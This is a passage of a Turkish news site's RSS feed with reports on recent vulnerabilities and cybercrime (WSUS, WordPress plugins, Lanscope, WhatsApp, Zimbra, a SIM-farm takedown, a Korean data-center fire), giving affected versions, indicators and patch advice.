<p data-start="1880" data-end="2195"><strong data-start="1880" data-end="1927">Saldırılarda Kullanılan Komutlar Belirlendi</strong><br data-start="1927" data-end="1930">Huntress’ın analizine göre saldırganlar, sistem kullanıcılarını ve ağ yapılandırmalarını belirlemek için “<strong data-start="2036" data-end="2046">whoami</strong>”, “<strong data-start="2050" data-end="2070">net user /domain</strong>” ve “<strong data-start="2076" data-end="2093">ipconfig /all</strong>” komutlarını kullanıyor. Bu bilgiler, saldırgan kontrolündeki uzak bir webhook adresine iletiliyor.</p>
<p data-start="2197" data-end="2522"><strong data-start="2197" data-end="2225">Ulusal Kurumlardan Uyarı</strong><br data-start="2225" data-end="2228">Hollanda Ulusal Siber Güvenlik Merkezi (NCSC-NL), 24 Ekim tarihli duyurusunda zafiyetin “sahada istismar edildiğini” doğruladı. Kurum, WSUS servislerinin genellikle internete açık olmaması gerektiğini hatırlatarak, <strong data-start="2443" data-end="2475">kamuya açık istismar kodunun</strong> mevcut olmasının riski artırdığını belirtti.</p>
<p data-start="2524" data-end="2924"><strong data-start="2524" data-end="2566">Microsoft: “İstismar Olasılığı Yüksek”</strong><br data-start="2566" data-end="2569">Microsoft, söz konusu açığı “<strong data-start="2598" data-end="2626">Exploitation More Likely</strong>” kategorisinde değerlendiriyor. Bu durum, CVE-2025-59287’nin saldırganlar için yüksek öncelikli bir hedef haline geldiğini gösteriyor. Şirket, henüz kendi güvenlik danışmanlığında aktif istismar bilgisini güncellemedi ancak tüm kullanıcıların en kısa sürede güncellemeleri uygulamasını öneriyor.</p>
<p data-start="2926" data-end="3078"></p><br><p><b>Ajans Expres Gazetesi</b></p>]]> </content:encoded>
</item>

<item>
<title>Eski WordPress Eklentileri Üzerinden Kitlesel Saldırılar Başlatıldı: Milyonlarca Deneme Engellendi</title>
<link>https://www.ajansexpres.com.tr/eski-wordpress-eklentileri-uzerinden-kitlesel-saldirilar-baslatildi-milyonlarca-deneme-engellendi</link>
<guid>https://www.ajansexpres.com.tr/eski-wordpress-eklentileri-uzerinden-kitlesel-saldirilar-baslatildi-milyonlarca-deneme-engellendi</guid>
<description><![CDATA[ Wordfence tarafından yayımlanan rapora göre saldırılar, CVE-2024-9234, CVE-2024-9707 ve CVE-2024-11972 olarak izlenen üç güvenlik açığını hedef alıyor. Her biri 9,8 şiddet puanına sahip açıklar, GutenKit ve Hunk Companion eklentilerindeki hatalı REST uç noktalarından kaynaklanıyor. Bu zafiyetler, saldırganların kimlik doğrulaması olmadan kötü amaçlı eklentiler yüklemesine imkâ ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202510/image_870x580_68fbe5b4ae08c.webp" length="59706" type="image/jpeg"/>
<pubDate>Fri, 24 Oct 2025 23:46:55 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords>wordpress gutenkit güvenlik açığı, hunk companion saldırısı, cve-2024-9234 nedir, wordfence saldırı raporu, wordpress eklenti güncellemesi</media:keywords>
<content:encoded><![CDATA[<p><br data-start="578" data-end="581"><strong data-start="581" data-end="631">Üç Kritik Açık Aktif Şekilde İstismar Ediliyor</strong><br data-start="631" data-end="634">Wordfence tarafından yayımlanan rapora göre saldırılar, <strong data-start="690" data-end="707">CVE-2024-9234</strong>, <strong data-start="709" data-end="726">CVE-2024-9707</strong> ve <strong data-start="730" data-end="748">CVE-2024-11972</strong> olarak izlenen üç güvenlik açığını hedef alıyor. Her biri 9,8 şiddet puanına sahip açıklar, GutenKit ve Hunk Companion eklentilerindeki hatalı REST uç noktalarından kaynaklanıyor. Bu zafiyetler, saldırganların kimlik doğrulaması olmadan kötü amaçlı eklentiler yüklemesine imkân veriyor.</p>
<p></p>
<p data-start="1039" data-end="1488"><strong data-start="1039" data-end="1080">Saldırılar GitHub Üzerinden Yayılıyor</strong><br data-start="1080" data-end="1083">Wordfence araştırmacıları, saldırganların GitHub üzerinde <strong data-start="1141" data-end="1153">“up.zip”</strong> adlı kötü amaçlı bir eklenti arşivi barındırdığını belirledi. Arşiv, dosya yükleme ve silme işlemlerini gizlice yapabilen, siteye kalıcı erişim sağlayan şifrelenmiş komut dosyaları içeriyor. Bu dosyalardan biri, <strong data-start="1366" data-end="1384">All in One SEO</strong> eklentisinin bir bileşeni gibi görünerek saldırganı otomatik olarak yönetici olarak giriş yaptırıyor.</p>
<p data-start="1490" data-end="1883"><strong data-start="1490" data-end="1529">Etkilenen Sürümler ve Güncellemeler</strong><br data-start="1529" data-end="1532">GutenKit’in 2.1.0 ve önceki sürümleri ile Hunk Companion’ın 1.8.5 ve altı sürümleri zafiyetlerden etkileniyor. Düzeltmeler, 2024 yılı sonlarında yayımlanan <strong data-start="1688" data-end="1706">GutenKit 2.1.1</strong> ve <strong data-start="1710" data-end="1734">Hunk Companion 1.9.0</strong> sürümlerinde yer aldı. Ancak Wordfence, birçok sitenin hâlen eski sürümleri kullandığını ve bu nedenle saldırılara açık durumda olduğunu bildirdi.</p>
<p data-start="1885" data-end="2400"><strong data-start="1885" data-end="1924">Saldırı İzleri ve Korunma Önerileri</strong><br data-start="1924" data-end="1927">Araştırmacılar, site yöneticilerinin erişim kayıtlarında <strong data-start="1984" data-end="2030">/wp-json/gutenkit/v1/install-active-plugin</strong> ve <strong data-start="2034" data-end="2069">/wp-json/hc/v1/themehunk-import</strong> gibi istekleri kontrol etmesi gerektiğini vurguladı. Ayrıca, <strong data-start="2131" data-end="2138">/up</strong>, <strong data-start="2140" data-end="2167">/ultra-seo-processor-wp</strong>, <strong data-start="2169" data-end="2177">/oke</strong> ve <strong data-start="2181" data-end="2202">/wp-query-console</strong> gibi dizinlerde şüpheli dosyaların varlığına dikkat edilmesi öneriliyor. Wordfence, saldırı trafiğinde öne çıkan IP adreslerini paylaşarak savunma mekanizmalarının güçlendirilmesini tavsiye etti.</p>
<p data-start="2402" data-end="2723"><strong data-start="2402" data-end="2448">WordPress Siteleri İçin Güncelleme Uyarısı</strong><br data-start="2448" data-end="2451">Uzmanlar, saldırıların hızla yayıldığını ve özellikle güncellenmemiş WordPress sitelerini hedef aldığını belirtti. Kullanıcılara tüm eklentilerini en son sürüme yükseltmeleri, gereksiz eklentileri kaldırmaları ve düzenli güvenlik taraması yapmaları çağrısında bulunuldu.</p>
<p data-start="2725" data-end="2878"></p><br><p><b>Ajans Expres Gazetesi</b></p>]]> </content:encoded>
</item>

<item>
<title>CISA, Motex Lanscope Endpoint Manager’daki Kritik Güvenlik Açığının Aktif Olarak Sömürüldüğünü Duyurdu</title>
<link>https://www.ajansexpres.com.tr/cisa-motex-lanscope-endpoint-managerdaki-kritik-guvenlik-aciginin-aktif-olarak-soemuruldugunu-duyurdu</link>
<guid>https://www.ajansexpres.com.tr/cisa-motex-lanscope-endpoint-managerdaki-kritik-guvenlik-aciginin-aktif-olarak-soemuruldugunu-duyurdu</guid>
<description><![CDATA[ ABD Siber Güvenlik ve Altyapı Güvenliği Ajansı (CISA), Japon teknoloji firması Motex tarafından geliştirilen Lanscope Endpoint Manager yazılımında tespit edilen ve saldırganlar tarafından aktif olarak istismar edilen kritik güvenlik açığı hakkında uyarı yayımladı. CVE-2025-61932 olarak izlenen açık, kimliği doğrulanmamış saldırganların özel hazırlanmış veri paketleriyle sistem üzerinde uzaktan kod çalıştırmasına olanak tanıyor. Motex, güvenlik güncellemesinin derhal uygulanması gerektiğini vurgularken, CISA bu açığı “bilinen istismar edilen güvenlik açıkları” listesine ekledi. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202510/image_870x580_68fbe48f4b2b6.webp" length="57160" type="image/jpeg"/>
<pubDate>Fri, 24 Oct 2025 23:42:06 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords>cve-2025-61932 nedir, lanscope endpoint manager güvenlik açığı, motex sıfır gün saldırısı, cisa kev listesi, japonya siber saldırıları</media:keywords>
<content:encoded><![CDATA[<p><br data-start="730" data-end="733"><strong data-start="733" data-end="786">Kritik Açık Uzaktan Kod Çalıştırmaya İzin Veriyor</strong><br data-start="786" data-end="789">CISA, Motex Lanscope Endpoint Manager yazılımında tespit edilen <strong data-start="853" data-end="871">CVE-2025-61932</strong> kodlu zafiyetin aktif olarak siber saldırılarda kullanıldığını açıkladı. 9,3 şiddet puanına sahip açık, sistemin gelen isteklerin kaynağını doğru şekilde doğrulamaması nedeniyle ortaya çıkıyor. Bu durum, saldırganların özel hazırlanmış paketlerle hedef sistemlerde uzaktan kod çalıştırmasına imkân tanıyor.</p>
<p></p>
<p data-start="1182" data-end="1650"><strong data-start="1182" data-end="1256">Motex: “Bazı Müşteri Sistemlerinde Kötü Amaçlı Paketler Tespit Edildi”</strong><br data-start="1256" data-end="1259">Kyocera Communication Systems’in bir iştiraki olan Japon Motex firması, güvenlik bülteninde “Endpoint Manager On-Premises istemci programı ve Detection Agent bileşeninde uzaktan kod yürütülmesine yol açan bir güvenlik açığı bulundu” ifadesine yer verdi. Firma, bazı müşteri ortamlarında kötü niyetli veri paketlerinin alındığını ve zafiyetin sıfır gün olarak istismar edildiğini doğruladı.</p>
<p data-start="1652" data-end="2059"><strong data-start="1652" data-end="1691">Güncelleme Dışında Çözüm Bulunmuyor</strong><br data-start="1691" data-end="1694">Motex, sorunun yalnızca istemci tarafında etkili olduğunu, yönetici bileşeninin güncellenmesine gerek olmadığını belirtti. Etkilenen sürümler 9.4.7.2 ve öncesi olarak listelenirken, 9.4.7.3 ve üzeri sürümlerle sorunun giderildiği bildirildi. Şirket, herhangi bir geçici çözüm veya azaltma yöntemi olmadığını, tek çözümün yazılımın güncellenmesi olduğunu açıkladı.</p>
<p data-start="2061" data-end="2431"><strong data-start="2061" data-end="2112">CISA, 12 Kasım’a Kadar Yama Zorunluluğu Getirdi</strong><br data-start="2112" data-end="2115">CISA, CVE-2025-61932’yi <strong data-start="2139" data-end="2182">“Known Exploited Vulnerabilities (KEV)”</strong> kataloğuna ekleyerek federal kurumlar için 12 Kasım 2025 tarihine kadar yama zorunluluğu getirdi. Bu zorunluluk yalnızca belirli devlet kurumlarını kapsasa da, CISA özel sektör kuruluşlarının da aynı güncellemeyi uygulaması gerektiğini vurguladı.</p>
<p data-start="2433" data-end="2882"><strong data-start="2433" data-end="2474">Japonya’da Saldırı Aktivitesi Artıyor</strong><br data-start="2474" data-end="2477">Japonya Ulusal Bilgisayar Acil Müdahale Ekibi (JPCERT/CC), söz konusu güvenlik açığının yerel kuruluşlara yönelik saldırılarda kullanıldığına dair bilgiler aldığını bildirdi. Ülkede son dönemde Asahi bira üreticisine yönelik Qilin fidye yazılımı saldırısı ve perakende devi Muji’nin çevrim içi satışlarını etkileyen Askul veri ihlali gibi olaylar, siber tehditlerin artış eğiliminde olduğunu gösteriyor.</p>
<p data-start="2884" data-end="3033"></p><br><p><b>Ajans Expres Gazetesi</b></p>]]> </content:encoded>
</item>

<item>
<title>Avrupa Genelinde Düzenlenen “SIMCARTEL” Operasyonunda 40.000 Aktif SIM Kart Ele Geçirildi</title>
<link>https://www.ajansexpres.com.tr/avrupa-genelinde-duzenlenen-simcartel-operasyonunda-40000-aktif-sim-kart-ele-gecirildi</link>
<guid>https://www.ajansexpres.com.tr/avrupa-genelinde-duzenlenen-simcartel-operasyonunda-40000-aktif-sim-kart-ele-gecirildi</guid>
<description><![CDATA[ Europol ve Eurojust koordinasyonunda, Letonya merkezli gerçekleştirilen “SIMCARTEL” adlı uluslararası operasyonda dolandırıcılık amaçlı kullanılan dev bir SIM çiftliği ağı çökertildi. 1.200 SIM-box cihazı ve 40.000 aktif SIM kartın ele geçirildiği operasyonda, Letonya’da 5 kişi olmak üzere toplam 7 şüpheli gözaltına alındı. Ağa ait altyapının 80’den fazla ülkenin telefon numaralarını kullanarak milyonlarca sahte hesap oluşturduğu ve yaklaşık 5 milyon euro tutarında zarara yol açtığı bildirildi. ]]></description>
<enclosure url="https://beykozunsesi.com.tr/uploads/images/202510/image_870x_68fbc21aa791a.webp" length="49398" type="image/jpeg"/>
<pubDate>Fri, 24 Oct 2025 23:05:19 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords>simcartel operasyonu nedir, europol simbox baskını, sim çiftliği dolandırıcılığı, sahte hesaplarda sim kart kullanımı</media:keywords>
<content:encoded><![CDATA[<p>Avrupa’da yürütülen geniş çaplı bir siber suç operasyonu kapsamında <strong data-start="704" data-end="745">“SIMCARTEL” kod adlı SIM çiftliği ağı</strong> ortaya çıkarıldı. Europol ve Eurojust koordinasyonunda yürütülen çalışmada, Letonya Devlet Polisi öncülüğünde Avusturya, Estonya ve Finlandiya kolluk birimleri eş zamanlı baskınlar düzenledi. Operasyon, 10 Ekim 2025 tarihinde icra edildi ve kamuoyuna 17–20 Ekim tarihleri arasında duyuruldu.</p>
<p><img src="https://beykozunsesi.com.tr/uploads/images/202510/image_870x_68fbc21aa791a.webp" alt=""></p>
<p></p>
<p data-start="1041" data-end="1527"><strong data-start="1041" data-end="1093">1.200 SIM-Box ve 40.000 Aktif Kart Ele Geçirildi</strong><br data-start="1093" data-end="1096">Yetkililer, ağın farklı ülkelerdeki SIM-box cihazlarına yerleştirilen on binlerce SIM kartı kullanarak uluslararası aramaları yerel gibi gösterdiğini, bu yöntemle kimlik gizleme, sahte yatırım ve phishing dolandırıcılıklarında aktif rol oynadığını açıkladı. Operasyonda 1.200 SIM-box, 5 sunucu ve 40.000 aktif SIM kartın yanı sıra €431.000 tutarında banka varlığı, $333.000 değerinde kripto para ve 4 lüks otomobil ele geçirildi.</p>
<p><img src="https://beykozunsesi.com.tr/uploads/images/202510/image_870x_68fbc2193002d.webp" alt=""></p>
<p data-start="1529" data-end="1969"><strong data-start="1529" data-end="1568">80’den Fazla Ülkede Sahte Hesap Ağı</strong><br data-start="1568" data-end="1571">Europol açıklamasına göre, ağ 80’den fazla ülkenin telefon numaralarıyla yaklaşık <strong data-start="1653" data-end="1696">49 ila 50 milyon sahte çevrim içi hesap</strong> oluşturmayı mümkün kıldı. Bu hesapların kimlik hırsızlığı, dolandırıcılık ve yasa dışı finansman faaliyetlerinde kullanıldığı değerlendiriliyor. Sadece Avusturya ve Letonya’da 3.200’den fazla vaka tespit edilirken, zararın toplamda 5 milyon euroya yaklaştığı bildirildi.</p>
<p><img src="https://beykozunsesi.com.tr/uploads/images/202510/image_870x_68fbc21787a42.webp" alt=""></p>
<p data-start="1971" data-end="2196"><strong data-start="1971" data-end="1994">Sitelere El Konuldu</strong><br data-start="1994" data-end="1997">Yetkililer, suçta kullanılan <strong data-start="2026" data-end="2042">gogetsms.com</strong> ve <strong data-start="2046" data-end="2060">apisim.com</strong> alan adlarına el koydu. Bu platformların, ağ üyelerine sahte numara üretimi ve SMS kimlik doğrulama hizmetleri sunduğu tespit edildi.</p>
<p><img src="https://beykozunsesi.com.tr/uploads/images/202510/image_870x_68fbc215eab1b.webp" alt=""></p>
<p data-start="2198" data-end="2496"><strong data-start="2198" data-end="2248">Uluslararası İş Birliği ve Soruşturmanın Seyri</strong><br data-start="2248" data-end="2251">Europol operasyonel destek sağlarken, Eurojust adli koordinasyonu yürüttü. Letonya merkezli soruşturma kapsamında 5 kişi Letonya’da, 2 kişi ise başka ülkelerde yakalandı. Dijital delillerin analizi ve finansal izleme süreci halen devam ediyor.</p>
<p data-start="2498" data-end="2790"><strong data-start="2498" data-end="2529">Siber Suç Ekonomisine Darbe</strong><br data-start="2529" data-end="2532">Uzmanlar, operasyonun “cybercrime-as-a-service” yapılarının çökertilmesinde önemli bir adım olduğunu belirtiyor. SIM-box sistemlerinin, siber suçluların kimlik gizleme ve geniş ölçekli dolandırıcılık altyapılarını sürdürmede kritik rol oynadığı vurgulandı.</p>
<p><a href="https://beykozunsesi.com.tr/avrupa-genelinde-duzenlenen-simcartel-operasyonunda-40000-aktif-sim-kart-ele-gecirildi" target="_blank" rel="noopener">Avrupa Genelinde Düzenlenen “SIMCARTEL” Operasyonunda 40.000 Aktif SIM Kart Ele Geçirildi</a></p>]]> </content:encoded>
</item>

<item>
<title>Güney Kore Devlet Veri Merkezi Yangını: 858 TB kalıcı veri kaybı, 709 kamu sistemi etkilendi</title>
<link>https://www.ajansexpres.com.tr/guney-kore-devlet-veri-merkezi-yangini-858-tb-kalici-veri-kaybi-709-kamu-sistemi-etkilendi</link>
<guid>https://www.ajansexpres.com.tr/guney-kore-devlet-veri-merkezi-yangini-858-tb-kalici-veri-kaybi-709-kamu-sistemi-etkilendi</guid>
<description><![CDATA[ 26 Eylül 2025’te Güney Kore’nin Daejeon kentindeki Ulusal Bilgi Kaynakları Servisi (NIRS) veri merkezinde çıkan yangın, ülkenin G-Drive bulut sistemini tamamen yok etti. 858 terabayt devlet verisi geri döndürülemez biçimde silinirken, 709 kamu sistemi durdu. 10 Ekim itibarıyla yalnızca %30,6’sı yeniden devreye alınabildi. İlk bulgulara göre yangın, lityum-iyon bataryada yaşanan arıza sonucu başladı; olayda yedekleme eksikliği ağır biçimde eleştirildi. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202510/image_870x580_68ea79ff4968f.webp" length="59650" type="image/jpeg"/>
<pubDate>Sat, 11 Oct 2025 18:38:51 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords>858 TB veri kaybının nedeni neydi, kamu hizmetleri hangi oranda etkilendi, G-Drive sisteminde neden yedek bulunmadı, soruşturma hangi teknik bulgulara odaklanıyor</media:keywords>
<content:encoded><![CDATA[<p>Güney Kore’nin Daejeon kentinde bulunan Ulusal Bilgi Kaynakları Servisi’ne (NIRS) ait devlet veri merkezinde 26 Eylül 2025 akşamı meydana gelen yangın, ülkenin dijital altyapısında ciddi kesintilere yol açtı. Yaklaşık 22 saat süren yangında “G-Drive” adlı ulusal bulut sistemi tamamen yok olurken, 858 terabaytlık devlet verisi kalıcı biçimde kaybedildi.</p>
<p><img src="https://www.ajansexpres.com.tr/uploads/images/202510/image_870x_68ea79724883b.webp" alt=""></p>
<p></p>
<p data-start="965" data-end="1192">İlk tespitlere göre olay, enerji depolama alanındaki lityum-iyon bataryalarda yaşanan arıza sonucu başladı. Yetkililer 384 batarya paketinin yanarak imha olduğunu, “termal kaçak” nedeniyle yangının hızla yayıldığını bildirdi.</p>
<p data-start="1194" data-end="1512"><strong data-start="1194" data-end="1224">709 kamu hizmeti etkilendi</strong><br data-start="1224" data-end="1227">Yangın sonrası 709 çevrimiçi kamu hizmeti geçici olarak durdu. Bunlar arasında kimlik doğrulama, dilekçe başvuruları, posta sistemleri ve idari modüller yer aldı. İlk günlerde yalnızca %10’u yeniden çalıştırılabildi. 10 Ekim 2025 itibarıyla 217 sistem (%30,6) yeniden devreye alındı.</p>
<p data-start="1514" data-end="1834"><strong data-start="1514" data-end="1561">Yedekleme eksikliği krizin boyutunu artırdı</strong><br data-start="1561" data-end="1564">Kayıpların büyük kısmı, G-Drive sisteminin harici yedekleme altyapısına sahip olmamasından kaynaklandı. Korea Joongang Daily’ye göre, sistem düşük öncelikli sınıflandırıldığı için harici yedekleme yatırımı yapılmamıştı. Bu nedenle verilerin kurtarılması mümkün olmadı.</p>
<p><img src="https://www.ajansexpres.com.tr/uploads/images/202510/image_870x_68ea7964f141f.webp" alt=""></p>
<p data-start="1836" data-end="2104"><strong data-start="1836" data-end="1883">Soruşturma pil kaynaklı senaryoya odaklandı</strong><br data-start="1883" data-end="1886">Polis ve teknik ekipler, yangının lityum-iyon bataryalardan kaynaklandığını doğrulamak için incelemelerini sürdürüyor. Batarya odalarındaki ısı sensörleri, enerji kesme sistemleri ve taşıma süreci üzerinde duruluyor.</p>
<p data-start="2106" data-end="2421"><strong data-start="2106" data-end="2143">Resmî tepkiler ve alınan önlemler</strong><br data-start="2143" data-end="2146">Cumhurbaşkanı Lee Jae-myung olayın ardından veri merkezini ziyaret ederek yedeklilik standartlarının güçlendirilmesi talimatını verdi. Kriz yönetim merkezi, hizmetlerin aşamalı olarak yeniden devreye alınacağını ve ikili (dual) sistem planlamasının başlatıldığını açıkladı.</p>
<p><img src="https://www.ajansexpres.com.tr/uploads/images/202510/image_870x_68ea79724883b.webp" alt=""></p>
<p data-start="2423" data-end="2767"><strong data-start="2423" data-end="2463">Uzmanlara göre olay ders niteliğinde</strong><br data-start="2463" data-end="2466">Uzmanlar, “bulut sistemlerin fiziksel risklerden muaf olmadığı” vurgusunu yaptı. Çok bölgeli mimarilerin ve düzenli yedekleme testlerinin zorunlu hale getirilmesi gerektiği ifade edildi. Ayrıca, enerji depolama odalarında lityum-iyon bataryaların güvenlik protokollerinin gözden geçirilmesi istendi.</p>
<p data-start="2769" data-end="2791"><strong data-start="2769" data-end="2789">Zaman çizelgesi:</strong></p>
<ul data-start="2792" data-end="3037">
<li data-start="2792" data-end="2861">
<p data-start="2794" data-end="2861"><strong data-start="2794" data-end="2812">26 Eylül 2025:</strong> Yangın 20.15 civarında başladı, hızla yayıldı.</p>
</li>
<li data-start="2862" data-end="2914">
<p data-start="2864" data-end="2914"><strong data-start="2864" data-end="2882">27 Eylül 2025:</strong> Yangın kontrol altına alındı.</p>
</li>
<li data-start="2915" data-end="2983">
<p data-start="2917" data-end="2983"><strong data-start="2917" data-end="2933">1 Ekim 2025:</strong> G-Drive verilerinin kurtarılamadığı kesinleşti.</p>
</li>
<li data-start="2984" data-end="3037">
<p data-start="2986" data-end="3037"><strong data-start="2986" data-end="3003">10 Ekim 2025:</strong> Kurtarma oranı %30,6’ya ulaştı.</p>
</li>
</ul>
<p data-start="3039" data-end="3220"><strong data-start="3039" data-end="3051"></strong></p><br><p><b>Ajans Expres Gazetesi</b></p>]]> </content:encoded>
</item>

<item>
<title>WhatsApp’ta kritik güvenlik açığı: Görsel dosya üzerinden tıklama gerektirmeden saldırı mümkün hale geldi</title>
<link>https://www.ajansexpres.com.tr/whatsappta-kritik-guvenlik-acigi-goersel-dosya-uzerinden-tiklama-gerektirmeden-saldiri-mumkun-hale-geldi</link>
<guid>https://www.ajansexpres.com.tr/whatsappta-kritik-guvenlik-acigi-goersel-dosya-uzerinden-tiklama-gerektirmeden-saldiri-mumkun-hale-geldi</guid>
<description><![CDATA[ Popüler mesajlaşma uygulaması WhatsApp, kullanıcı etkileşimi olmadan cihazlara kötü amaçlı kod yüklenmesine neden olabilecek kritik bir güvenlik açığını kapatmak için acil güncelleme yayımladı. CVE-2025-55177 ve CVE-2025-43300 olarak tanımlanan zafiyetler, özellikle iOS ve macOS sürümlerinde DNG formatındaki görsel dosyalar aracılığıyla uzaktan kod çalıştırılmasına imkân tanıyor. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202510/image_870x580_68e9457d48c91.webp" length="12918" type="image/jpeg"/>
<pubDate>Fri, 10 Oct 2025 20:42:30 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords>WhatsApp güvenlik açığı nasıl istismar edildi, hangi sürümler risk altında, kullanıcılar cihazlarını nasıl koruyabilir, sıfır tıklama saldırılarına karşı ne tür önlemler alınmalı</media:keywords>
<content:encoded><![CDATA[<p>WhatsApp, cihaz güvenliğini doğrudan etkileyen yeni bir sıfır tıklama (zero-click) güvenlik açığı nedeniyle acil bir güvenlik yaması yayımladı. CVE-2025-55177 ve CVE-2025-43300 kodlarıyla kayıt altına alınan açık, herhangi bir kullanıcı etkileşimi olmadan zararlı kodların çalıştırılmasına olanak tanıyor.</p>
<p></p>
<p data-start="856" data-end="1103">Uzmanlara göre açık, uygulamanın “bağlı cihaz senkronizasyonu” ve “otomatik medya işleme” özelliklerini hedef alıyor. Bu sayede saldırganlar, kurbana herhangi bir dosya açtırmadan veya bağlantıya tıklatmadan cihazda uzaktan kod çalıştırabiliyor.</p>
<p data-start="1105" data-end="1324">Zafiyetin temelinde Apple platformlarında kullanılan görsel işleme kütüphanesindeki bir “out-of-bounds” belleğe taşma hatası bulunuyor. Saldırı, özel hazırlanmış bir <code data-start="1271" data-end="1277">.DNG</code> uzantılı dosyanın işlenmesiyle tetikleniyor.</p>
<p data-start="1326" data-end="1485">Saldırıların sınırlı sayıda yüksek riskli kullanıcıyı hedef aldığı bildirildi. Ancak Meta, tüm kullanıcıların derhal güncellemelerini yapmasını tavsiye etti.</p>
<p data-start="1487" data-end="1512"><strong data-start="1487" data-end="1510">Etkilenen sürümler:</strong></p>
<ul data-start="1513" data-end="1668">
<li data-start="1513" data-end="1561">
<p data-start="1515" data-end="1561">WhatsApp for iOS: 2.25.21.73 öncesi sürümler</p>
</li>
<li data-start="1562" data-end="1619">
<p data-start="1564" data-end="1619">WhatsApp Business for iOS: 2.25.21.78 öncesi sürümler</p>
</li>
<li data-start="1620" data-end="1668">
<p data-start="1622" data-end="1668">WhatsApp for Mac: 2.25.21.78 öncesi sürümler</p>
</li>
</ul>
<p data-start="1670" data-end="1703"><strong data-start="1670" data-end="1701">Önerilen güvenlik adımları:</strong></p>
<ul data-start="1704" data-end="2158">
<li data-start="1704" data-end="1771">
<p data-start="1706" data-end="1771">WhatsApp ve işletim sisteminin en güncel sürümlerine geçilmesi.</p>
</li>
<li data-start="1772" data-end="1866">
<p data-start="1774" data-end="1866">Otomatik medya indirme ve bağlı cihaz özelliklerinin geçici olarak devre dışı bırakılması.</p>
</li>
<li data-start="1867" data-end="1981">
<p data-start="1869" data-end="1981">Güvenilir bir kaynak üzerinden cihaz taraması yapılması veya olay müdahale ekibiyle analiz gerçekleştirilmesi.</p>
</li>
<li data-start="1982" data-end="2063">
<p data-start="1984" data-end="2063">Kritik hesaplarda kimlik bilgisi ve parolaların güvenli cihazdan yenilenmesi.</p>
</li>
<li data-start="2064" data-end="2158">
<p data-start="2066" data-end="2158">Ağ bağlantı kayıtları, zaman damgaları ve dosya geçmişlerinin adli analiz için saklanması.</p>
</li>
</ul>
<p data-start="2160" data-end="2353">Uzmanlar, bu tür “zero-click” açıklarının yüksek hedefli siber casusluk faaliyetlerinde kullanıldığına dikkat çekerek tüm kullanıcıların hızlı şekilde güncelleme yapması gerektiğini belirtti.</p>
<p data-start="2355" data-end="2552"><strong data-start="2355" data-end="2367"></strong></p><br><p><b>Ajans Expres Gazetesi</b></p>]]> </content:encoded>
</item>

<item>
<title>Zimbra e&#45;posta platformunda kritik güvenlik açığı: .ICS dosyaları üzerinden saldırı riski tespit edildi</title>
<link>https://www.ajansexpres.com.tr/zimbra-e-posta-platformunda-kritik-guvenlik-acigi-ics-dosyalari-uzerinden-saldiri-riski-tespit-edildi</link>
<guid>https://www.ajansexpres.com.tr/zimbra-e-posta-platformunda-kritik-guvenlik-acigi-ics-dosyalari-uzerinden-saldiri-riski-tespit-edildi</guid>
<description><![CDATA[ Zimbra’nın klasik web istemcisinde tespit edilen sıfırıncı gün (zero-day) güvenlik açığı, kötü amaçlı JavaScript kodlarının .ICS uzantılı takvim dosyaları aracılığıyla otomatik olarak çalıştırılmasına neden oluyor. CVE-2025-27915 koduyla takip edilen bu açık, saldırganlara kullanıcı e-postalarını yönlendirme, posta kurallarını değiştirme ve kimlik bilgilerini ele geçirme imkânı veriyor. ]]></description>
<enclosure url="https://www.ajansexpres.com.tr/uploads/images/202510/image_870x580_68e9448e2d300.webp" length="12276" type="image/jpeg"/>
<pubDate>Fri, 10 Oct 2025 20:38:32 +0300</pubDate>
<dc:creator>Haber Koordinatörü</dc:creator>
<media:keywords>Zimbra güvenlik açığı nasıl çalışıyor, CVE-2025-27915 hangi sürümleri etkiliyor, kullanıcılar sistemlerini nasıl koruyabilir, hangi güvenlik önlemleri alınmalı</media:keywords>
<content:encoded><![CDATA[<p>Zimbra e-posta servisinde tespit edilen yeni bir güvenlik zafiyeti, kullanıcı hesaplarını doğrudan hedef aldı. CVE-2025-27915 olarak tanımlanan açık, klasik web istemcisindeki bir "Stored XSS" (kalıcı XSS) hatasından kaynaklanıyor.</p>
<p></p>
<p data-start="787" data-end="1027">Uzmanlara göre zafiyet, .ICS uzantılı takvim dosyalarında HTML kodlarının doğru şekilde filtrelenmemesinden ortaya çıkıyor. Bu durum, zararlı JavaScript komutlarının e-posta oturumu içinde otomatik olarak çalıştırılmasına olanak sağlıyor.</p>
<p data-start="1029" data-end="1257">Açık üzerinden gerçekleştirilen saldırılar sonucunda, kullanıcı hesaplarına ait posta yönlendirme kuralları değiştirilebiliyor, e-postalar harici adreslere iletilebiliyor ve kimlik bilgileriyle kişi listeleri sızdırılabiliyor.</p>
<p data-start="1259" data-end="1380"><strong data-start="1259" data-end="1284">Güncellenen sürümler:</strong><br data-start="1284" data-end="1287">Zimbra, güvenlik açığını kapatan yamaları yayımladı. Güvenli sürümler şu şekilde açıklandı:</p>
<ul data-start="1381" data-end="1422">
<li data-start="1381" data-end="1399">
<p data-start="1383" data-end="1399">9.0.0 Patch 44</p>
</li>
<li data-start="1400" data-end="1411">
<p data-start="1402" data-end="1411">10.0.13</p>
</li>
<li data-start="1412" data-end="1422">
<p data-start="1414" data-end="1422">10.1.5</p>
</li>
</ul>
<p data-start="1424" data-end="1534">Uzmanlar, eski sürümleri kullanan sistem yöneticilerine acil olarak güncelleme yapmaları uyarısında bulundu.</p>
<p data-start="1536" data-end="1569"><strong data-start="1536" data-end="1567">Önerilen güvenlik adımları:</strong></p>
<ul data-start="1570" data-end="1948">
<li data-start="1570" data-end="1627">
<p data-start="1572" data-end="1627">Zimbra sisteminin güncel yamalı sürüme yükseltilmesi.</p>
</li>
<li data-start="1628" data-end="1713">
<p data-start="1630" data-end="1713">Şüpheli veya yeni oluşturulmuş e-posta yönlendirme kurallarının kontrol edilmesi.</p>
</li>
<li data-start="1714" data-end="1781">
<p data-start="1716" data-end="1781">DNS ve HTTP kayıtlarında olağan dışı bağlantıların incelenmesi.</p>
</li>
<li data-start="1782" data-end="1847">
